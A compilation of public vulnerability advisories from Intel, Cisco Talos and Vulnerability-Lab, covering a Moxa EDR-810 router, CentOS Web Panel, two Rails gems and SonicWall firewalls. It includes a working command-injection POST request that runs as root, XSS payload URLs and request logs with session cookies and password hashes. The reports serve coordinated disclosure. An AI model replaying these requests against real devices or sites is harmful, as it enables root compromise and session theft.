An issue was discovered in the __ns_get_path function in fs/nsfs.c in the Linux kernel before 4.11. Due to a race condition when accessing files, a Use After Free condition can occur. This also affects all Android releases from CAF using the Linux kernel (Android for MSM, Firefox OS for MSM, QRD Android) before security patch level 2018-07-05.

CVE-2018-5873

An integer overflow during the parsing of XML using the Expat library. This vulnerability affects Firefox < 50.

CVE-2016-9063

Parameter corruption in NDIS filter driver in Intel Online Connect Access 1.9.22.0 allows an attacker to cause a denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Parameter corruption in NDIS filter driver in Intel® Online Connect Access 1.9.22.0 allows an attacker to cause a denial of service via local access**

Intel ID:  

INTEL-SA-00121

Product family:  

Latest Intel Core® Processors  

Impact of vulnerability:  

Denial of Service

Severity rating:  

Moderate

Original release:  

May 14, 2018

Last revised:  

May 14, 2018

**Summary:**

Parameter corruption in NDIS filter driver in Intel® Online Connect Access 1.9.22.0 allows an unprivileged attacker to cause a denial of service via local system access.

**Description:**

An external security researcher identified a potential parameter input validation corruption condition that affects Intel® Online Connect Access 1.9.22.0, resulting to a potential denial of service condition or Operating System crash. Loss of sensitive data is not likely due to this issue.

An update has been developed by Intel to resolve this issue.

**CVE ID**

**CVE Title**

CVSSv3 severity

**CVSSv3 Vectors**

**CVE-2018-3634**

Parameter corruption in NDIS filter driver in Intel® Online Connect Access 1.9.22.0 allows an attacker to cause a denial of service via local access

5.9 (Medium)

CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

**Affected Products/Technologies:**

Intel® Online Connect Access prior to and including version 1.9.22.0.

**Recommendation:**

Intel recommends that end users should check with their system manufacturers and apply any available updates as soon as practical.

**Acknowledgements:**

Intel would like to thank Vadim Smirnov for discovering CVE-2018-3634 and working with Intel on a public coordinated disclosure.

**References:**

If you need further assistance, contact Intel Customer Support to submit an online service request.

**Revision History**

Revision

Date

Description

1.0

May 14, 2018

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2018-3634: INTEL-SA-00121

An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the remoteNetmask0= parameter in the "/goform/net\_Web\_get_value" uri to trigger this vulnerability.

**Summary**

An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into various paramaters in the “/goform/net\_Web\_get\_value” uri to trigger this vulnerability.

**Tested Versions**

Moxa EDR-810 V4.1 build 17030317

**Product URLs**

https://www.moxa.com/product/EDR-810.htm

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**Details**

Once logged in to the device’s web interface, a user can configure OpenVPN via a POST to “/goform/net\_Web\_get\_value”. An attacker can inject commands via POST parameters. The web server is running as a root user, therefor injected commands will run as root.

**CVE-2017-14432 - openvpnServer0\_tmp**

This following parameter is vulnerable to a command injection.

    Vulnerable URI: /goform/net_Web_get_value
    Vulnerable Parm: openvpnServer0_tmp=
    

**CVE-2017-14433 - remoteNetwork0**

This following parameter is vulnerable to a command injection.

    Vulnerable URI: /goform/net_Web_get_value
    Vulnerable Parm: remoteNetwork0=
    

**CVE-2017-14434 - remoteNetmask0**

This following parameter is vulnerable to a command injection.

    Vulnerable URI: /goform/net_Web_get_value
    Vulnerable Parm: remoteNetmask0=
    

**Exploit Proof-of-Concept**

In order to exploit this vulnerability the following POST request can be sent.

    POST /goform/net_Web_get_value?SRV=SRV_OPENVPN_SERVER_USER HTTP/1.1
    Host: 192.168.127.254
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Referer: http://192.168.127.254/openvpn_user.asp
    Cookie: NAME=admin; PASSWORD=1cf17e0c60ed7ecb0977fdfc0e218c65; AUTHORITY=0
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 199
    
    openvpnServer0_tmp=AAAA%2Bvvvvv%2B%60sleep%2B10%60%2B%60sleep%2B10%60%2B&ovpnServerId=1&username0=AAAA&password0=vvvvv&password_c=vvvvv&remoteNetwork0=%60sleep%2B10%60&remoteNetmask0=%60sleep%2B10%60
    

**Timeline**

2017-11-15 - Vendor Disclosure  
2017-11-19 - Vendor Acknowledged  
2017-12-25 - Vendor provided timeline for fix (Feb 2018)  
2018-01-04 - Timeline pushed to mid-March per vendor  
2018-03-24 - Talos follow up with vendor for release timeline  
2018-03-26 - Timeline pushed to 4/13/18 per vendor  
2018-04-12 - Vendor patched & published new firmware on website  
2018-04-13 - Public Release

Discovered by Carlos Pacho of Cisco Talos.

CVE-2017-14434: TALOS-2017-0482 || Cisco Talos Intelligence Group

An exploitable clear text transmission of password vulnerability exists in the web server and telnet functionality of Moxa EDR-810 V4.1 build 17030317. An attacker can look at network traffic to get the admin password for the device. The attacker can then use the credentials to login as admin.

**Summary**

An exploitable clear text transmission of password vulnerability exists in the web server and telnet functionality of Moxa EDR-810 V4.1 build 17030317. An attacker can look at network traffic to get the admin password for the device. The attacker can then use the credentials to login as admin.

**Tested Versions**

Moxa EDR-810 V4.1 build 17030317

**Product URLs**

https://www.moxa.com/product/EDR-810.htm

**CVSSv3 Score**

5.7 - CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

**CWE**

CWE 317 - Cleartext Transmission of Sensitive Information

**Details**

By default the device uses HTTP instead of HTTPS. Passwords are sent in clear text. An attacker can monitor network traffic for a password.

**Exploit Proof-of-Concept**

The following POST is sent with plain text credentials.

    POST /init.asp HTTP/1.1
    Host: 192.168.127.254
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.127.254/Login.asp
    Cookie: NAME=admin; PASSWORD=d3bff8450106a52369b8b4dbca7b1b16; AUTHORITY=; 		sysnotify_support=yes; sysnotify_loginStatus=initial; lasttime=1509719511146; Auto-	Logout_Time=300000; sessionID=1707101564
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 50
    
    Username=admin&Password=moxa&Submit.x=0&Submit.y=0
    

**Timeline**

2017-11-15 - Vendor Disclosure  
2017-11-19 - Vendor Acknowledged  
2017-12-25 - Vendor provided timeline for fix (Feb 2018)  
2018-01-04 - Timeline pushed to mid-March per vendor  
2018-03-24 - Talos follow up with vendor for release timeline  
2018-03-26 - Timeline pushed to 4/13/18 per vendor  
2018-04-12 - Vendor patched & published new firmware on website  
2018-04-13 - Public Release

Discovered by Carlos Pacho of Cisco Talos.

CVE-2017-12123: TALOS-2017-0475 || Cisco Talos Intelligence Group

An exploitable Weak Cryptography for Passwords vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. An attacker could intercept weakly encrypted passwords and could brute force them.

**Summary**

An exploitable Weak Cryptography for Passwords vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. An attacker could intercept weakly encrypted passwords and could brute force them.

**Tested Versions**

Moxa EDR-810 V4.1 build 17030317

**Product URLs**

https://www.moxa.com/product/EDR-810.htm

**CVSSv3 Score**

3.5 - CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

**CWE**

CWE-216 - Weak Cryptography for Passwords

**Details**

After the initial login, each authenticated request sends a HTTP packet with a MD5 hash of the password. This hash is not salted and can be cracked, revealing the device’s password.

**Exploit Proof-of-Concept**

In the Cookie there is a PASSWORD= parameter. This parameter contain a MD5 of the users password.

    GET /overview.asp HTTP/1.1
    Host: 192.168.127.254
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.127.254/home.asp?action=go
    Cookie: sysnotify_support=yes; sysnotify_loginStatus=initial; lasttime=1506954769474; NAME=admin; PASSWORD=1cf17e0c60ed7ecb0977fdfc0e218c65; AUTHORITY=0; Auto-Logout_Time=3600000; sessionID=2933537563
    Connection: keep-alive
    

**Timeline**

2017-11-15 - Vendor Disclosure  
2017-11-19 - Vendor Acknowledged  
2017-12-25 - Vendor provided timeline for fix (Feb 2018)  
2018-01-04 - Timeline pushed to mid-March per vendor  
2018-03-24 - Talos follow up with vendor for release timeline  
2018-03-26 - Timeline pushed to 4/13/18 per vendor  
2018-04-12 - Vendor patched & published new firmware on website  
2018-04-13 - Public Release

Discovered by Carlos Pacho of Cisco Talos.

CVE-2017-12129: TALOS-2017-0481 || Cisco Talos Intelligence Group

CentOS-WebPanel.com (aka CWP) CentOS Web Panel through v0.9.8.12 has XSS via the `module` value of the `index.php` file.

Document Title: =============== CentOS Web Panel v0.9.8.12 - CS Cross Site Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get\_content.php?id=1835 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5961 CVE-ID: ======= CVE-2018-5961 Release Date: ============= 2018-01-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1835 Common Vulnerability Scoring System: ==================================== 4 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== CentOS Web Panel - Free Web Hosting control panel is designed for quick and easy management of (Dedicated & VPS) servers without of need to use ssh console for every little thing. There is lot's of options and features for server management in this control panel. CWP automatically installs full LAMP on your server (apache,php, phpmyadmin, webmail, mailserver…). (Copy of the Homepage: http://centos-webpanel.com/features ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a client-side cross site scripting vulnerability in the CentOS Web Panel v0.9.8.12. Vulnerability Disclosure Timeline: ================================== 2017-01-15: Non-Public Disclosure (Vulnerability Laboratory - Shared Customer Research Feed) Discovery Status: ================= Published Affected Product(s): ==================== CWP Product: CentOS Web Panel - (CWP) 0.9.8.12 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A client-side cross site scripting web vulnerability has been discovered in the official CentOS Web Panel v0.9.8.12. The vulnerability allows remote attackers to inject script code to the client-side browser to application requests. The client-side cross site web vulnerability is located in the \`module\` value of the \`index.php\` file GET method request. The vulnerability can be exploited by remote attackers with a prepared malicious link to the centos web-panel application. The request method to inject is GET and the attack vector is non-persistent. The injection point is the module parameter and the execution point occurs in the module exception. The security risk of the client-side vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. Exploitation of the non-persisten vulnerability requires no privileged web-application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected or connected application modules. Request Method(s): \[+\] GET Vulnerable Module(s): \[+\] index.php Vulnerable Parameter(s): \[+\] module Proof of Concept (PoC): ======================= The cross site scripting vulnerability can be exploited by remote attackers without privileged web-application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Dork(s): "powered by CentOS-WebPanel.com" PoC: Payload(s) http://localhost:2030/index.php?module=clam%3E%22%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C http://localhost:2030/index.php?module=clam PoC: Exception-Handling

The module clam>"<\[CLIENT SIDE SCRIPT CODE PAYLOAD EXECUTION!\]> does not exist.

\--- PoC Session Logs \[POST\] --- Status: 200\[OK\] GET http://localhost:2030/index.php?module=clam%3E%22%3Ciframesrc=a%20onload=alert(document.cookie)%20%3C Mime Type\[text/html\] Request Header: Host\[localhost:2030\] User-Agent\[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0\] Accept\[text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8\] Cookie\[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; PHPSESSID=8dsrha0ivd80kkgukvklgvmct1\] Connection\[keep-alive\] Response Header: Server\[Apache/2.2.27 (Unix) mod\_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27\] X-Powered-By\[PHP/5.4.27\] Expires\[Thu, 19 Nov 1981 08:52:00 GMT\] Keep-Alive\[timeout=5, max=100\] Connection\[Keep-Alive\] Transfer-Encoding\[chunked\] Content-Type\[text/html\] Reference(s): http://localhost:2030/index.php Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable module parameter in the index-php file GET method request. Disallow special chars and restrict the parameter input to prevent further client-side script code injection attacks. Encode the output of the error exception for invalid inputs to prevent the execution point of the client-side vulnerability. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the centos web panel is estimated as medium. Credits & Authors: ================== Vulnerability-Lab \[admin@vulnerability-lab.com\] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss\_upcoming.php - vulnerability-lab.com/rss/rss\_news.php Social: twitter.com/vuln\_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2017 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

CVE-2018-5961

An exploitable cross site scripting (XSS) vulnerability exists in the filter functionality of the delayed_job_web rails gem version 1.4. A specially crafted URL can cause an XSS flaw resulting in an attacker being able to execute arbitrary javascript on the victim's browser. An attacker can phish an authenticated user to trigger this vulnerability.

**Summary**

An exploitable XSS vulnerability exists in the filter functionality of the delayed\_job\_web rails gem version 1.4. A specially crafted URL can cause an XSS flaw resulting in an attacker being able to execute arbitrary javascript on the victim’s browser. An attacker can phish an authenticated user to trigger this vulnerability.

**Tested Versions**

delayed\_job\_web 1.4

**Product URLs**

https://github.com/ejschmitt/delayed\_job\_web https://rubygems.org/gems/delayed\_job\_web/versions/1.4

**CVSSv3 Score**

6.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

**CWE**

CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

**Details**

The delayed\_job\_web gem allows users to filter output based on the query string of the GET request. This looks similar to.

localhost:3000/delayed\_job/overview?queues=”>+<script>alert(1)<%2Fscript>

This URL can them be used to phish an authenticated user and execute arbitrary javascript on their behalf. This vulnerability is caught by the built in XSS protections of Safari and Chrome., however it is exploitable using Firefox.

**Credit**

Discovered by Zachary Sanchez of Cisco ASIG

**Timeline**

2017-09-20 - Vendor Disclosure  
2018-01-09 - Public Release

CVE-2017-12097: TALOS-2017-0449 || Cisco Talos Intelligence Group

An exploitable cross site scripting (XSS) vulnerability exists in the add filter functionality of the rails_admin rails gem version 1.2.0. A specially crafted URL can cause an XSS flaw resulting in an attacker being able to execute arbitrary javascript on the victim's browser. An attacker can phish an authenticated user to trigger this vulnerability.

**Summary**

An exploitable XSS vulnerability exists in the add filter functionality of the rails\_admin rails gem version 1.2.0. A specially crafted URL can cause an XSS flaw resulting in an attacker being able to execute arbitrary javascript on the victim’s browser. An attacker can phish an authenticated user to trigger this vulnerability.

**Tested Versions**

rails\_admin 1.2.0

**Product URLs**

https://github.com/sferik/rails\_admin https://rubygems.org/gems/rails\_admin/versions/1.2.0

**CVSSv3 Score**

6.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

**CWE**

CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

**Details**

The rails\_admin gem has functionality which allows a user to create custom filters to find values within the admin interface. When a new filter is created using the UI, it redirects to a new url containing that filtering information in the form of

localhost:3000/admin/model?model\_name=model&utf8=%E2%9C%93&f%5B password%5D%5B91178%5D%5Bv%5D=+%22%3E%3Cimg+src%3D%22%22+onerror%3D%22 alert(1)%22%3E&query=

This URL can them be used to phish an authenticated user and execute arbitrary javascript on their behalf.

This vulnerability was shown to occur using Chrome, Safari, and Firefox.

**Timeline**

2017-09-20 - Vendor Disclosure  
2017-09-28 - 2nd Vendor contact attempt  
2017-10-11 - 3rd Vendor contact attempt  
2017-12-05 - Final Vendor contact  
2018-01-10 - Public Release

CVE-2017-12098: TALOS-2017-0450 || Cisco Talos Intelligence Group

SonicWall SonicOS on Network Security Appliance (NSA) 2017 Q4 devices has XSS via the CFS Custom Category and Cloud AV DB Exclusion Settings screens.

Document Title: =============== SonicWall SonicOS NSA - Bypass & Persistent Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get\_content.php?id=1729 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5281 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5280 CVE-ID: ======= CVE-2018-5281 Release Date: ============= 2018-01-04 Vulnerability Laboratory ID (VL-ID): ==================================== 1729 Common Vulnerability Scoring System: ==================================== 4.5 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 2.000€ - 3.000€ Product & Service Introduction: =============================== Achieve a deeper level of security with the SonicWALL Network Security Appliance (NSA) Series of next-generation firewalls. NSA Series appliances integrate automated and dynamic security capabilities into a single platform, combining the patented1, SonicWALL Reassembly Free Deep Packet Inspection (RFDPI) firewall engine with a powerful, massively scalable, multi-core architecture. Now you can block even the most sophisticated threats with an intrusion prevention system (IPS) featuring advanced anti-evasion capabilities, SSL decryption and inspection, and network-based malware protection that leverages the power of the cloud. (Copy of the Homepage: http://www.sonicwall.com/products/sonicwall-nsa/ ) The proven SonicOS architecture is at the core of every Dell SonicWALL firewall from the SuperMassive™ E10800 to the TZ 100. SonicOS uses deep packet inspection technology in combination with multi-core specialized security microprocessors to deliver application intelligence, control, and real-time visualization, intrusion prevention, high-speed virtual private networking (VPN) technology and other robust security features. (Copy of the Homepage: http://www.sonicwall.com/network-security-os-platform/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a filter bypass issue and an application-side vulnerability in the official DELL SonicWall SonicOS NSA Series web-application firewall (utm) appliances. Vulnerability Disclosure Timeline: ================================== 2018-01-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== DELL SonicWall Product: Sonicwall SonicOS (all versions) Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A filter bypass issue and an application-side web vulnerability has been discovered in the official SonicWall NSA Web-Firewall Appliance Series with SonicOS. The filter bypass issue allows an attacker to bypass a restricted mechanism or a filter protection to finally evade the controls of the web-application. The \`Security Service\` section with the \`Content Filter\` module allows an attacker to bypass the regular web-filter validation mechanism. Remote attackers with privileged appliance user accounts are able to inject own malicious script codes on the application-side of the affected modules. The filter of the \`CFS Custom Category\` module with the \`Add\` function allows an attacker to bypass the regular web-filter validation of the web-application. As far as an attacker injects in the \`CFS Custom Category\` a payload to the as \`Name\`, he will be forced to use only words without script code by a secure exception-handling. In the Formular of the Edit procedure is also an \`Update\` function available. Remote attackers with local low privileged user accounts are able to bypass the name input validation the following way. First the attacker inserts a regular domain, after that the update function is available. Now the attacker injects his payload to the \` Content\` input field and clicks update to the already temporarily stored entry. Now the illegal payload is inside the listing and can be saved via \`OK\` for further manipulation to compromise the web appliance of sonicwall. The vulnerable files were the injection point is located are \`addTrustedDomainDlg.html\` and \`gavCloudExclusions.html\`. The final script code execution occurs in the \`main.html or index\` file. The same filter bypass issue is located in the \`Cloud AV DB Exclusion Settings\` module with the vulnerable \`Cloud AV Signature ID\` input field context as well. After the context is include an application-side script code execution occurs in the main listing of the \`CFS Custom Category\`. The validation does not encode the input of the Edit formular and sends the context to the item listing in the index of the content filter module. The attack vector of the issue is located on the application-side and the request method to inject is POST. The security risk of the filter bypass and persistent validation vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.5. Exploitation of the persistent input validation web vulnerability requires a low privileged or restricted web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): \[+\] POST Vulnerable Module(s): \[+\] CFS Custom Category \[+\] Cloud AV DB Exclusion Settings Vulnerable File(s): \[+\] addTrustedDomainDlg.html \[+\] gavCloudExclusions.html Vulnerable Inputs(s): \[+\] Name \[+\] Content \[+\] Cloud AV Signature ID Vulnerable Parameter(s): \[+\] cfsRatingObjectName \[+\] selectedItem \[+\] itemList \[+\] cfsRatingDomainList \[+\] gav\_cloud\_exclude\_list \[+\] inputbox \[+\] list Affected Module(s): \[+\] CFS Custom Category - Item Listing (Name & Content) \[+\] Gateway Anti-Virus Signatures - Item Listing (Name & Content) Proof of Concept (PoC): ======================= The filter bypass and application-side input validation vulnerability can be exploited by remote attackers with privileged web-application user account and low or medium user interaction For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the appliance web-application (nsa series) 2. Login to the application 3. Switch to the Security Services 4. Open the Content Filter module 5. Scroll down and click in the \`CFS Custom Category\` the \`Add\` button 6. Now, a new form opens with several inputs Note: To edit existing items the item listing or to add new context to the item listing 7. Include a regular name and a basic content as domain name 8. Save the entry temporarily via \`Add\` to the edit list 9. Choose the same track that you added and include a script code payload after the domainname 10. Now, click on update (Note via Add!) 11. The illegal domain context is now saved Note: We used the update function to bypass the protected Add mechanism 12. Click the Ok button to save the entry to the dbms of the appliance web-application 13. The code executes directly in the item list of the CFS Custom Category module next to the add function 14. Successful reproduce of the filter bypass issue and persistent vulnerability! --- Session Logs (Standard Request) --- Status: pending\[\] POST https://utm\_waf.sonicwall.localhost:8351/main.cgi Mime Type\[unknown\] Request Header: Host\[utm\_waf.sonicwall.localhost:8351\] User-Agent\[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\] Accept\[text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8\] Accept-Language\[de,en-US;q=0.7,en;q=0.3\] Accept-Encoding\[gzip, deflate\] Referer\[https://utm\_waf.sonicwall.localhost:8351/addCfsLocalRating\_-1.html\] Cookie\[curUrl=securityServicesCFView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0\] POST-Daten: csrfToken\[\] cfsRatingObjectName\[test23\] cfsRatingCategory\[2\] selectedItem\[test.com\] itemList\[test.com\] cfsRatingDomainList\[test.com\] refresh\_page\[securityServicesCFView.html\] tableIndex\[-1\] cgiaction\[%5Bobject+Window%5D\] --- PoC Session Logs (POST) \[Inject\] #1 --- Status: pending\[\] POST https://utm\_waf.sonicwall.localhost:8351/main.cgi Mime Type\[unknown\] Request Header: Host\[utm\_waf.sonicwall.localhost:8351\] User-Agent\[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\] Accept\[text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8\] Accept-Language\[de,en-US;q=0.7,en;q=0.3\] Accept-Encoding\[gzip, deflate\] Referer\[https://utm\_waf.sonicwall.localhost:8351/addCfsLocalRating\_-1.html\] Cookie\[curUrl=systemStatusView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0\] POST-Daten: csrfToken\[\] cfsRatingObjectName\[+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3EMALIICOUS INJECTED PAYLOAD!\] cfsRatingCategory\[9\] selectedItem\[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E\] itemList\[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E\] cfsRatingDomainList\[testdomain.com++%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dprompt%2823%29%3B%26gt%3B+++%22%26gt%3B%26lt%3B%22%26lt%3Bimg+src%3D%22x%22%26gt%3B%2520%2520%26gt%3B%22%26lt%3Biframe+src%3Da%26gt%3B%2520%26lt%3Biframe%26gt%3B\] refresh\_page\[securityServicesCFView.html\] tableIndex\[-1\] cgiaction\[%5Bobject+Window%5D\] --- PoC Session Logs (POST) \[Inject\] #2 --- Status: pending\[\] POST https://utm\_waf.sonicwall.localhost:8351/main.cgi Mime Type\[unknown\] Request Header: Host\[utm\_waf.sonicwall.localhost:8351\] User-Agent\[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\] Accept\[text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8\] Accept-Language\[de,en-US;q=0.7,en;q=0.3\] Accept-Encoding\[gzip, deflate\] Referer\[https://utm\_waf.sonicwall.localhost:8351/gavCloudExclusions.html\] Cookie\[curUrl=gavSummary.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0; 2039=local; 2040=%7B%22refreshTime%22%3A3%2C%22 showTimeRange%22%3A10%2C%22refreshEnable%22%3Atrue%2C %22viewApplications%22%3A1%2C%22viewBandwidth%22%3A1%2C%22viewPktRate%22%3A1%2C%22viewPktSize%22%3A1%2C%22 